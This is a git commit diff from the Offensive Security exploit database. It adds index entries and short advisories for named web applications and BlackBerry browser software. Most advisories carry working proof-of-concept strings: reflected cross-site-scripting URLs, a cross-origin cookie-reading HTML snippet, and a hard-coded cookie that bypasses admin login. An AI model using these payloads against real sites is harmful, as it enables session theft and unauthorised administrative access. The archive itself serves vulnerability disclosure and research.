Updated 09_30_2014
This commit is contained in:
Offensive Security
parent
021d9deef3
commit
66d3c41613
8 changed files with 91 additions and 0 deletions
|
|
@ -31331,3 +31331,10 @@ id,file,description,date,author,platform,type,port
|
|||
34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
|
||||
34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
|
||||
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
|
||||
34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
|
||||
34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 'ogp_show.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
|
||||
34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0
|
||||
34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0
|
||||
34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
|
||||
34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 'vote.php' Cross Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0
|
||||
34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
29
platforms/hardware/remote/34802.html
Executable file
29
platforms/hardware/remote/34802.html
Executable file
|
|
@ -0,0 +1,29 @@
|
|||
source: http://www.securityfocus.com/bid/43685/info
|
||||
|
||||
Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.
|
||||
|
||||
An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.
|
||||
|
||||
# [+] BlackBerry Browser Cross Origin Bypass
|
||||
#
|
||||
# [+] Author : 599eme Man
|
||||
# [+] Contact : Flouf@live.fr
|
||||
#
|
||||
#[------------------------------------------------------------------------------------]
|
||||
#
|
||||
# [+] How use ?
|
||||
#
|
||||
# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
|
||||
#
|
||||
# [+] PoC :
|
||||
#
|
||||
# Create a file.htm, save it with this code below and upload it on your server.
|
||||
#
|
||||
# <!--
|
||||
# BlackBerry Cross Origin Bypass<br>
|
||||
# Found by 599eme Man<br>
|
||||
# flouf@live.fr<br>
|
||||
# Test On google<br>
|
||||
# -->
|
||||
# <a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test me</a><br>
|
||||
# <iframe name="blackb" src="http://www.example.com"> </iframe>
|
||||
9
platforms/php/webapps/34803.txt
Executable file
9
platforms/php/webapps/34803.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43689/info
|
||||
|
||||
Online Guestbook Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Online Guestbook Pro 5.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice==
|
||||
10
platforms/php/webapps/34804.txt
Executable file
10
platforms/php/webapps/34804.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/43692/info
|
||||
|
||||
Rentventory is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
|
||||
|
||||
Rentventory 1.0.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?Login=<script>alert('xss')</script>
|
||||
http://www.example.com/index.php?Password=<script>alert('xss')</script>
|
||||
8
platforms/php/webapps/34805.txt
Executable file
8
platforms/php/webapps/34805.txt
Executable file
|
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/43693/info
|
||||
|
||||
StatsCode is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Login : '><script>alert('xss')</script>
|
||||
Password : '><script>alert('xss')</script>
|
||||
9
platforms/php/webapps/34806.txt
Executable file
9
platforms/php/webapps/34806.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43697/info
|
||||
|
||||
JNM Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
JNM Guestbook 3.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/scripts/guestbook/test2/?page=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc
|
||||
9
platforms/php/webapps/34807.txt
Executable file
9
platforms/php/webapps/34807.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/43699/info
|
||||
|
||||
JNM Solutions DB Top Sites is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
JNM Solutions DB Top Sites 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/topsites/vote.php?u=RGVtb24=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(314888759311)%3B%3C/ScRiPt%3E
|
||||
10
platforms/php/webapps/34808.txt
Executable file
10
platforms/php/webapps/34808.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/43702/info
|
||||
|
||||
Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
|
||||
|
||||
Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.
|
||||
|
||||
Rapidsendit Clone Script 2.1 and prior are vulnerable.
|
||||
|
||||
javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
|
||||
696d29e0940a4957748fe3fc9efd22a3 = password
|
||||
Loading…
Add table
Reference in a new issue